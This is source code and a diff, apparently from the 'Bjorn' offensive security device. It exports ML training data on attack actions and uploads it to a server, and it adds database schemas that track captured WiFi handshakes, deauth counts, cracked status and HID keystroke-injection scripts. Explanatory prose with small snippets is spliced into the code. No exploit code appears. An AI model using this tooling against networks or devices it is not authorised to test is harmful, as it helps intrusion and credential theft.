"""Return feature names that pass the minimum variance threshold."""
threshold = self._feature_variance_min
variances = self._get_feature_variances()
selected = [name for name, var in variances.items() if var >= threshold]
dropped = len(variances) - len(selected)
if dropped > 0:
logger.info(
f"Feature selection: kept {len(selected)}/{len(variances)} features "
f"(dropped {dropped} near-zero variance < {threshold})"
)
return sorted(selected)
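Putting the two helpers together: a feature that never varies accumulates identical values, so its `sum_sq/n - mean²` variance is zero and it falls below the threshold. A self-contained sketch of the same accumulator (sample data and the 0.001 threshold mirror the default, for illustration):

```python
stats = {}  # name -> [sum, sum_of_squares, count]
samples = {"rssi": [1.0, 2.0, 3.0, 4.0], "constant_flag": [1.0, 1.0, 1.0, 1.0]}
for name, values in samples.items():
    for v in values:
        s = stats.setdefault(name, [0.0, 0.0, 0])
        s[0] += v
        s[1] += v * v
        s[2] += 1

variances = {}
for name, (s, sq, n) in stats.items():
    mean = s / n
    variances[name] = max(0.0, sq / n - mean * mean)

selected = sorted(name for name, var in variances.items() if var >= 0.001)
print(variances["rssi"], selected)  # 1.25 ['rssi']
```

`constant_flag` is dropped because its variance is exactly 0; only `rssi` survives selection.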
def _write_feature_manifest(self, selected_features: List[str], export_filepath: str):
"""Write feature_manifest.json alongside the export file."""
try:
variances = self._get_feature_variances()
manifest = {
'created_at': datetime.now().isoformat(),
'feature_count': len(selected_features),
'min_variance_threshold': self._feature_variance_min,
'features': {
name: {'variance': round(variances.get(name, 0.0), 6)}
for name in selected_features
},
'export_file': str(export_filepath),
}
manifest_path = self.export_dir / 'feature_manifest.json'
with open(manifest_path, 'w', encoding='utf-8') as f:
json.dump(manifest, f, indent=2)
logger.info(f"Feature manifest written: {manifest_path} ({len(selected_features)} features)")
except Exception as e:
logger.error(f"Failed to write feature manifest: {e}")
# ═══════════════════════════════════════════════════════════════════════
# EXPORT FUNCTIONS
# ═══════════════════════════════════════════════════════════════════════
def export_for_training(
self,
format: str = 'csv',
compress: bool = True,
max_records: Optional[int] = None
) -> Tuple[str, int]:
"""
Export consolidated features for deep learning training.
Args:
format: 'csv', 'jsonl', or 'parquet'
compress: Whether to gzip the output
max_records: Maximum records to export (None = all)
Returns:
Tuple of (file_path, record_count)
"""
try:
if max_records is None:
max_records = int(getattr(self.shared_data, "ai_export_max_records", 1000))
max_records = max(100, min(int(max_records), 20000))
# Generate filename
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
base_filename = f"bjorn_training_{timestamp}.{format}"
if compress and format != 'parquet':
base_filename += '.gz'
filepath = self.export_dir / base_filename
# Fetch data
limit_clause = f"LIMIT {max_records}"
records = self.db.query(f"""
SELECT
mf.*,
mfa.feature_vector,
mfa.success_rate as aggregated_success_rate,
mfa.total_actions as aggregated_total_actions
FROM ml_features mf
LEFT JOIN ml_features_aggregated mfa
ON mf.mac_address = mfa.mac_address
WHERE mf.consolidated=1 AND mf.export_batch_id IS NULL
ORDER BY mf.timestamp DESC
{limit_clause}
""")
if not records:
logger.warning("No consolidated records to export")
return "", 0
# Extract IDs before export so we can free the records list early
record_ids = [r['id'] for r in records]
# Export based on format
if format == 'csv':
count = self._export_csv(records, filepath, compress)
elif format == 'jsonl':
count = self._export_jsonl(records, filepath, compress)
elif format == 'parquet':
count = self._export_parquet(records, filepath)
else:
raise ValueError(f"Unsupported format: {format}")
# Free the large records list immediately after export — record_ids is all we still need
del records
# AI-01: Write feature manifest with variance-filtered feature names
try:
selected = self._get_selected_features()
if selected:
self._write_feature_manifest(selected, str(filepath))
except Exception as e:
logger.error(f"Feature manifest generation failed: {e}")
# Create export batch record
batch_id = self._create_export_batch(filepath, count)
# Update records with batch ID
placeholders = ','.join('?' * len(record_ids))
self.db.execute(f"""
UPDATE ml_features
SET export_batch_id=?
WHERE id IN ({placeholders})
""", [batch_id] + record_ids)
del record_ids
logger.success(
f"Exported {count} records to {filepath} "
f"(batch_id={batch_id})"
)
return str(filepath), count
except Exception as e:
logger.error(f"Export failed: {e}")
raise
def _export_csv(
self,
records: List[Dict],
filepath: Path,
compress: bool
) -> int:
"""Export records as CSV"""
open_func = gzip.open if compress else open
mode = 'wt' if compress else 'w'
# 1. Flatten all records first to collect all possible fieldnames
flattened = []
all_fieldnames = set()
for r in records:
flat = {
'timestamp': r['timestamp'],
'mac_address': r['mac_address'],
'ip_address': r['ip_address'],
'action_name': r['action_name'],
'success': r['success'],
'duration_seconds': r['duration_seconds'],
'reward': r['reward']
}
# Parse and flatten features
for field in ['host_features', 'network_features', 'temporal_features', 'action_features']:
try:
features = json.loads(r.get(field, '{}'))
for k, v in features.items():
if isinstance(v, (int, float, bool, str)):
flat_key = f"{field}_{k}"
flat[flat_key] = v
except Exception as e:
logger.debug(f"Skip bad JSON in {field}: {e}")
# Add named feature vector
if r.get('feature_vector'):
try:
vector = json.loads(r['feature_vector'])
if isinstance(vector, dict):
for k, v in vector.items():
flat[f'feat_{k}'] = v
elif isinstance(vector, list):
for i, v in enumerate(vector):
flat[f'feature_{i}'] = v
except Exception as e:
logger.debug(f"Skip bad feature vector: {e}")
flattened.append(flat)
all_fieldnames.update(flat.keys())
# 2. Sort fieldnames for consistency
sorted_fieldnames = sorted(list(all_fieldnames))
all_fieldnames = None # Free the set
# 3. Write CSV
with open_func(filepath, mode, newline='', encoding='utf-8') as f:
if flattened:
writer = csv.DictWriter(f, fieldnames=sorted_fieldnames)
writer.writeheader()
writer.writerows(flattened)
count = len(flattened)
flattened = None # Free the expanded list
return count
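Because different records can carry different feature keys, the exporter flattens everything first, unions the key sets into one sorted header, and lets `csv.DictWriter` fill missing cells with its empty-string default. A minimal sketch of that union-of-keys approach:

```python
import csv
import io

rows = [{"mac": "aa", "feat_ports": 3}, {"mac": "bb", "feat_ttl": 64}]
fieldnames = sorted(set().union(*(r.keys() for r in rows)))

buf = io.StringIO()
writer = csv.DictWriter(buf, fieldnames=fieldnames)  # restval='' fills absent keys
writer.writeheader()
writer.writerows(rows)
print(buf.getvalue())
# feat_ports,feat_ttl,mac
# 3,,aa
# ,64,bb
```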
def _export_jsonl(
self,
records: List[Dict],
filepath: Path,
compress: bool
) -> int:
"""Export records as JSON Lines"""
open_func = gzip.open if compress else open
mode = 'wt' if compress else 'w'
with open_func(filepath, mode, encoding='utf-8') as f:
for r in records:
# Avoid mutating `records` in place to keep memory growth predictable.
row = dict(r)
for field in ['host_features', 'network_features', 'temporal_features', 'action_features', 'raw_event']:
try:
row[field] = json.loads(row.get(field, '{}'))
except Exception:
row[field] = {}
if row.get('feature_vector'):
try:
row['feature_vector'] = json.loads(row['feature_vector'])
except Exception:
row['feature_vector'] = {}
f.write(json.dumps(row) + '\n')
return len(records)
def _export_parquet(self, records: List[Dict], filepath: Path) -> int:
"""Export records as Parquet (requires pyarrow)"""
try:
import pyarrow as pa
import pyarrow.parquet as pq
# Flatten records
flattened = []
for r in records:
flat = dict(r)
# Parse JSON fields
for field in ['host_features', 'network_features', 'temporal_features', 'action_features', 'raw_event']:
flat[field] = json.loads(r.get(field, '{}'))
if r.get('feature_vector'):
flat['feature_vector'] = json.loads(r['feature_vector'])
flattened.append(flat)
# Convert to Arrow table
table = pa.Table.from_pylist(flattened)
# Write parquet
pq.write_table(table, filepath, compression='snappy')
return len(records)
except ImportError:
logger.error("Parquet export requires pyarrow. Falling back to CSV.")
return self._export_csv(records, filepath.with_suffix('.csv'), compress=True)
def _create_export_batch(self, filepath: Path, count: int) -> int:
"""Create export batch record and return batch ID"""
result = self.db.execute("""
INSERT INTO ml_export_batches (file_path, record_count, status)
VALUES (?, ?, 'exported')
""", (str(filepath), count))
# Get the inserted ID
batch_id = self.db.query("SELECT last_insert_rowid() as id")[0]['id']
return batch_id
# ═══════════════════════════════════════════════════════════════════════
# UTILITY METHODS
# ═══════════════════════════════════════════════════════════════════════
def get_export_stats(self) -> Dict[str, Any]:
"""Get statistics about exports"""
try:
batches = self.db.query("""
SELECT COUNT(*) as total_batches,
SUM(record_count) as total_records,
MAX(created_at) as last_export
FROM ml_export_batches
WHERE status='exported'
""")[0]
pending = self.db.query("""
SELECT COUNT(*) as cnt
FROM ml_features
WHERE consolidated=1 AND export_batch_id IS NULL
""")[0]['cnt']
return {
'total_export_batches': batches.get('total_batches', 0),
'total_records_exported': batches.get('total_records', 0),
'last_export_time': batches.get('last_export'),
'pending_export_count': pending
}
except Exception as e:
logger.error(f"Error getting export stats: {e}")
return {}
def flush_pending_uploads(self, max_files: int = 3) -> int:
"""
Retry uploads for previously exported batches that were not transferred yet.
Returns the number of successfully transferred files.
"""
max_files = max(0, int(max_files))
if max_files <= 0:
return 0
# No heavy backlog tracking needed: pending uploads = files present in export_dir.
files = self._list_pending_export_files(limit=max_files)
ok = 0
for fp in files:
if self.upload_to_server(fp):
ok += 1
else:
# Stop early when server is unreachable to avoid repeated noise.
if self.last_server_attempted and self.last_server_contact_ok is False:
break
return ok
def _list_pending_export_files(self, limit: int = 3) -> List[str]:
"""
Return oldest export files present in export_dir.
This makes the backlog naturally equal to the number of files on disk.
"""
limit = max(0, int(limit))
if limit <= 0:
return []
try:
d = Path(self.export_dir)
if not d.exists():
return []
def _safe_mtime(path: Path) -> float:
try:
return path.stat().st_mtime
except Exception:
return float("inf")
# Keep only the N oldest files in memory instead of sorting all candidates.
files_iter = (p for p in d.glob("bjorn_training_*") if p.is_file())
oldest = heapq.nsmallest(limit, files_iter, key=_safe_mtime)
return [str(p) for p in oldest]
except Exception:
return []
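`heapq.nsmallest` keeps only the N best candidates while streaming the generator, instead of materializing and sorting every matching file. The same selection on synthetic `(name, mtime)` pairs:

```python
import heapq

files = [("d.csv", 400.0), ("a.csv", 100.0), ("c.csv", 300.0), ("b.csv", 200.0)]
oldest = heapq.nsmallest(2, files, key=lambda f: f[1])  # two smallest mtimes
print([name for name, _ in oldest])  # ['a.csv', 'b.csv']
```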
def _mark_batch_status(self, filepath: str, status: str, notes: str = "") -> None:
"""Update ml_export_batches status for a given file path (best-effort)."""
try:
self.db.execute(
"""
UPDATE ml_export_batches
SET status=?, notes=?
WHERE file_path=?
""",
(status, notes or "", str(filepath)),
)
except Exception:
pass
def _safe_delete_uploaded_export(self, filepath: Path) -> None:
"""Delete a successfully-uploaded export file if configured to do so."""
try:
if not bool(self.shared_data.config.get("ai_delete_export_after_upload", True)):
return
fp = filepath.resolve()
base = Path(self.export_dir).resolve()
# Safety: only delete files under export_dir.
if base not in fp.parents:
return
fp.unlink(missing_ok=True) # Python 3.8+ supports missing_ok
except TypeError:
# Python < 3.8 fallback (not expected here, but safe)
try:
if filepath.exists():
filepath.unlink()
except Exception:
pass
except Exception:
pass
def upload_to_server(self, filepath: str) -> bool:
"""
Upload export file to AI Validation Server.
Args:
filepath: Path to the file to upload
Returns:
True if upload successful
"""
self._set_server_contact_state(False, None)
try:
import requests
except ImportError:
requests = None
if requests is None:
logger.info_throttled(
"AI upload skipped: requests not installed",
key="ai_upload_no_requests",
interval_s=600.0,
)
return False
url = self.shared_data.config.get("ai_server_url")
if not url:
logger.info_throttled(
"AI upload skipped: ai_server_url not configured",
key="ai_upload_no_url",
interval_s=600.0,
)
return False
backoff_s = max(10, int(self.shared_data.config.get("ai_upload_retry_backoff_s", 120)))
max_backoff_s = 3600
now_mono = time.monotonic()
if now_mono < self._upload_backoff_until:
remaining = int(self._upload_backoff_until - now_mono)
logger.debug(f"AI upload backoff active ({remaining}s remaining)")
logger.info_throttled(
"AI upload deferred: backoff active",
key="ai_upload_backoff_active",
interval_s=180.0,
)
return False
try:
filepath = Path(filepath)
if not filepath.exists():
logger.warning(f"AI upload skipped: file not found: {filepath}")
self._mark_batch_status(str(filepath), "missing", "file not found")
return False
# Get MAC address for unique identification
try:
from ai_utils import get_system_mac
mac = get_system_mac()
except ImportError:
mac = "unknown"
logger.debug(f"Uploading {filepath.name} to AI Server ({url}) unique_id={mac}")
self._set_server_contact_state(True, None)
with open(filepath, 'rb') as f:
files = {'file': f}
# Send MAC as query param
# Server expects ?mac_addr=...
params = {'mac_addr': mac}
# Short timeout to avoid blocking
response = requests.post(f"{url}/upload", files=files, params=params, timeout=10)
if response.status_code == 200:
self._set_server_contact_state(True, True)
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
logger.success(f"Uploaded {filepath.name} successfully")
self._mark_batch_status(str(filepath), "transferred", "uploaded")
self._safe_delete_uploaded_export(filepath)
return True
else:
self._set_server_contact_state(True, False)
next_retry_s = self._apply_upload_backoff(backoff_s, max_backoff_s)
logger.debug(
f"AI upload HTTP failure for {filepath.name}: status={response.status_code}, "
f"next retry in {next_retry_s}s"
)
logger.info_throttled(
f"AI upload deferred (HTTP {response.status_code})",
key=f"ai_upload_http_{response.status_code}",
interval_s=300.0,
)
return False
except Exception as e:
self._set_server_contact_state(True, False)
next_retry_s = self._apply_upload_backoff(backoff_s, max_backoff_s)
logger.debug(f"AI upload exception for {filepath}: {e} (next retry in {next_retry_s}s)")
logger.info_throttled(
"AI upload deferred: server unreachable (retry later)",
key="ai_upload_exception",
interval_s=300.0,
)
return False
def cleanup_old_exports(self, days: int = 30):
"""Delete export files older than N days"""
try:
cutoff = datetime.now() - timedelta(days=days)
old_batches = self.db.query("""
SELECT file_path FROM ml_export_batches
WHERE created_at < ?
""", (cutoff.isoformat(),))
deleted = 0
for batch in old_batches:
filepath = Path(batch['file_path'])
if filepath.exists():
filepath.unlink()
deleted += 1
# Clean up database records
self.db.execute("""
DELETE FROM ml_export_batches
WHERE created_at < ?
""", (cutoff.isoformat(),))
logger.info(f"Cleaned up {deleted} old export files")
except Exception as e:
logger.error(f"Cleanup failed: {e}")
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════


@@ -26,6 +26,9 @@ from db_utils.comments import CommentOps
from db_utils.agents import AgentOps
from db_utils.studio import StudioOps
from db_utils.webenum import WebEnumOps
from db_utils.sentinel import SentinelOps
from db_utils.bifrost import BifrostOps
from db_utils.loki import LokiOps
logger = Logger(name="database.py", level=logging.DEBUG)
@@ -61,7 +64,10 @@ class BjornDatabase:
self._agents = AgentOps(self._base)
self._studio = StudioOps(self._base)
self._webenum = WebEnumOps(self._base)
self._sentinel = SentinelOps(self._base)
self._bifrost = BifrostOps(self._base)
self._loki = LokiOps(self._base)
# Ensure schema is created
self.ensure_schema()
@@ -138,7 +144,10 @@ class BjornDatabase:
self._agents.create_tables()
self._studio.create_tables()
self._webenum.create_tables()
self._sentinel.create_tables()
self._bifrost.create_tables()
self._loki.create_tables()
# Initialize stats singleton
self._stats.ensure_stats_initialized()
@@ -156,6 +165,15 @@ class BjornDatabase:
return self._config.save_config(config)
# Host operations
def get_host_by_mac(self, mac_address: str) -> Optional[Dict[str, Any]]:
"""Get a single host by MAC address"""
try:
results = self.query("SELECT * FROM hosts WHERE mac_address=? LIMIT 1", (mac_address,))
return results[0] if results else None
except Exception as e:
logger.error(f"Error getting host by MAC {mac_address}: {e}")
return None
def get_all_hosts(self) -> List[Dict[str, Any]]:
return self._hosts.get_all_hosts()
@@ -259,7 +277,27 @@ class BjornDatabase:
def get_last_action_statuses_for_mac(self, mac_address: str) -> Dict[str, Dict[str, str]]:
return self._queue.get_last_action_statuses_for_mac(mac_address)
# Circuit breaker operations
def record_circuit_breaker_failure(self, action_name: str, mac: str = '',
max_failures: int = 5, cooldown_s: int = 300) -> None:
return self._queue.record_circuit_breaker_failure(action_name, mac, max_failures, cooldown_s)
def record_circuit_breaker_success(self, action_name: str, mac: str = '') -> None:
return self._queue.record_circuit_breaker_success(action_name, mac)
def is_circuit_open(self, action_name: str, mac: str = '') -> bool:
return self._queue.is_circuit_open(action_name, mac)
def get_circuit_breaker_status(self, action_name: str, mac: str = '') -> Optional[Dict[str, Any]]:
return self._queue.get_circuit_breaker_status(action_name, mac)
def reset_circuit_breaker(self, action_name: str, mac: str = '') -> None:
return self._queue.reset_circuit_breaker(action_name, mac)
def count_running_actions(self, action_name: Optional[str] = None) -> int:
return self._queue.count_running_actions(action_name)
# Vulnerability operations
def add_vulnerability(self, mac_address: str, vuln_id: str, ip: Optional[str] = None,
hostname: Optional[str] = None, port: Optional[int] = None):
@@ -519,6 +557,21 @@ class BjornDatabase:
def vacuum(self) -> None:
"""Vacuum the database"""
return self._base.vacuum()
def close(self) -> None:
"""Close database connection gracefully."""
try:
with self._lock:
if hasattr(self, "_base") and self._base:
# DatabaseBase handles the actual connection closure
if hasattr(self._base, "_conn") and self._base._conn:
self._base._conn.close()
logger.info("BjornDatabase connection closed")
except Exception as e:
logger.debug(f"Error during database closure (ignorable if already closed): {e}")
# Removed __del__ as it can cause circular reference leaks and is not guaranteed to run.
# Lifecycle should be managed by explicit close() calls.
# Internal helper methods used by modules
def _table_exists(self, name: str) -> bool:


@@ -162,7 +162,8 @@ class ActionOps:
b_rate_limit = COALESCE(excluded.b_rate_limit, actions.b_rate_limit),
b_stealth_level = COALESCE(excluded.b_stealth_level, actions.b_stealth_level),
b_risk_level = COALESCE(excluded.b_risk_level, actions.b_risk_level),
b_enabled = COALESCE(excluded.b_enabled, actions.b_enabled),
-- Keep persisted enable/disable state from DB across restarts.
b_enabled = actions.b_enabled,
b_args = COALESCE(excluded.b_args, actions.b_args),
b_name = COALESCE(excluded.b_name, actions.b_name),
b_description = COALESCE(excluded.b_description, actions.b_description),
@@ -218,8 +219,10 @@ class ActionOps:
WHERE id = 1
""", (action_count_row['cnt'],))
# Invalidate cache so callers immediately see fresh definitions
type(self).get_action_definition.cache_clear()
logger.info(f"Synchronized {len(actions)} actions")
def list_actions(self):
"""List all action definitions ordered by class name"""
return self.base.query("SELECT * FROM actions ORDER BY b_class;")
@@ -261,23 +264,6 @@ class ActionOps:
})
return out
# def list_action_cards(self) -> list[dict]:
# """Lightweight descriptor of actions for card-based UIs"""
# rows = self.base.query("""
# SELECT b_class, b_enabled
# FROM actions
# ORDER BY b_class;
# """)
# out = []
# for r in rows:
# cls = r["b_class"]
# out.append({
# "name": cls,
# "image": f"/actions/actions_icons/{cls}.png",
# "enabled": int(r.get("b_enabled", 1) or 1),
# })
# return out
@lru_cache(maxsize=32)
def get_action_definition(self, b_class: str) -> Optional[Dict[str, Any]]:
"""Cached lookup of an action definition by class name"""

db_utils/bifrost.py (new file, 116 lines)

@@ -0,0 +1,116 @@
"""
Bifrost DB operations — networks, handshakes, epochs, activity, peers, plugin data.
"""
import logging
from logger import Logger
logger = Logger(name="db_utils.bifrost", level=logging.DEBUG)
class BifrostOps:
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create all Bifrost tables."""
# WiFi networks discovered by Bifrost
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_networks (
bssid TEXT PRIMARY KEY,
essid TEXT DEFAULT '',
channel INTEGER DEFAULT 0,
encryption TEXT DEFAULT '',
rssi INTEGER DEFAULT 0,
vendor TEXT DEFAULT '',
num_clients INTEGER DEFAULT 0,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
handshake INTEGER DEFAULT 0,
deauthed INTEGER DEFAULT 0,
associated INTEGER DEFAULT 0,
whitelisted INTEGER DEFAULT 0
)
""")
# Captured handshakes
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_handshakes (
id INTEGER PRIMARY KEY AUTOINCREMENT,
ap_mac TEXT NOT NULL,
sta_mac TEXT NOT NULL,
ap_essid TEXT DEFAULT '',
channel INTEGER DEFAULT 0,
rssi INTEGER DEFAULT 0,
filename TEXT DEFAULT '',
captured_at TEXT DEFAULT CURRENT_TIMESTAMP,
uploaded INTEGER DEFAULT 0,
cracked INTEGER DEFAULT 0,
UNIQUE(ap_mac, sta_mac)
)
""")
# Epoch history
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_epochs (
id INTEGER PRIMARY KEY AUTOINCREMENT,
epoch_num INTEGER NOT NULL,
started_at TEXT NOT NULL,
duration_secs REAL DEFAULT 0,
num_deauths INTEGER DEFAULT 0,
num_assocs INTEGER DEFAULT 0,
num_handshakes INTEGER DEFAULT 0,
num_hops INTEGER DEFAULT 0,
num_missed INTEGER DEFAULT 0,
num_peers INTEGER DEFAULT 0,
mood TEXT DEFAULT 'ready',
reward REAL DEFAULT 0,
cpu_load REAL DEFAULT 0,
mem_usage REAL DEFAULT 0,
temperature REAL DEFAULT 0,
meta_json TEXT DEFAULT '{}'
)
""")
# Activity log (event feed)
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_activity (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
event_type TEXT NOT NULL,
title TEXT NOT NULL,
details TEXT DEFAULT '',
meta_json TEXT DEFAULT '{}'
)
""")
self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_bifrost_activity_ts "
"ON bifrost_activity(timestamp DESC)"
)
# Peers (mesh networking — Phase 2)
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_peers (
peer_id TEXT PRIMARY KEY,
name TEXT DEFAULT '',
version TEXT DEFAULT '',
face TEXT DEFAULT '',
encounters INTEGER DEFAULT 0,
last_channel INTEGER DEFAULT 0,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
# Plugin persistent state
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_plugin_data (
plugin_name TEXT NOT NULL,
key TEXT NOT NULL,
value TEXT DEFAULT '',
PRIMARY KEY (plugin_name, key)
)
""")
logger.debug("Bifrost tables created/verified")

db_utils/loki.py (new file, 51 lines)

@@ -0,0 +1,51 @@
"""
Loki DB operations — HID scripts and job tracking.
"""
import logging
from logger import Logger
logger = Logger(name="db_utils.loki", level=logging.DEBUG)
class LokiOps:
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create all Loki tables."""
# User-saved HID scripts
self.base.execute("""
CREATE TABLE IF NOT EXISTS loki_scripts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL UNIQUE,
description TEXT DEFAULT '',
content TEXT NOT NULL DEFAULT '',
category TEXT DEFAULT 'general',
target_os TEXT DEFAULT 'any',
created_at TEXT DEFAULT CURRENT_TIMESTAMP,
updated_at TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
# Job execution history
self.base.execute("""
CREATE TABLE IF NOT EXISTS loki_jobs (
id TEXT PRIMARY KEY,
script_id INTEGER,
script_name TEXT DEFAULT '',
status TEXT DEFAULT 'pending',
output TEXT DEFAULT '',
error TEXT DEFAULT '',
started_at TEXT,
finished_at TEXT,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_loki_jobs_status "
"ON loki_jobs(status)"
)
logger.debug("Loki tables created/verified")

Some files were not shown because too many files have changed in this diff.